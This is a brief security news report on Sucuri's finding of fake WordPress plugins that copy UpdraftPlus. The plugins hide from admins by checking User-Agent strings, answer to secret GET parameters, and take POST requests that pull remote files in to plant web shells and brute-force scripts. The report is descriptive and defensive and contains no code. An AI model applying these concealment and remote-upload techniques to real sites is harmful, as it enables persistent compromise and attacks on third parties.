Malicious actors utilize fake plugins with backdoor capabilities that hide in plain sight to compromise and maintain the access to WordPress websites, and to upload web shells and scripts for brute-forcing other sites. The researchers at Sucuri have spotted several such plugins (named initiatorseo or updrat123) that are based on the structure of the popular backup/restore plugin UpdraftPlus, which has more than 2 million active installations and is regularly updated by contributors.
“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” the researchers said.
The malicious plugins hide themselves in the WordPress dashboard from anyone who doesn’t use browsers with specific User-Agent strings. These strings vary from plugin to plugin. Such plugins can easily be created with the help of ready-made automated tools or by including malicious payloads such as web shells within the source code of legitimate ones.
According to Sucuri, the fake plugin will also announce its presence if attackers add a specific GET parameter to requests, such as initiationactivity or testingkey. The main purpose of these plugins is to serve as a backdoor allowing the hackers to upload web shells containing a script used for brute-forcing other websites to different root directories of compromised site. This script is used to test lists of username/password pairs on targeted WordPress sites.
To upload arbitrary files on compromised site the attackers use POST requests, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server. The names of these POST parameters are unique for each analysed plugin, the researchers found.
“While none of the approaches used by this attack are new, it clearly demonstrates how cleaning only the visible parts of an infection is not enough. Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface,” the researchers concluded. They also added that compromised websites may be leveraged as a platform to launch attacks invisible from outside, such as DDoS and brute-force attacks, spam or cryptomining operations.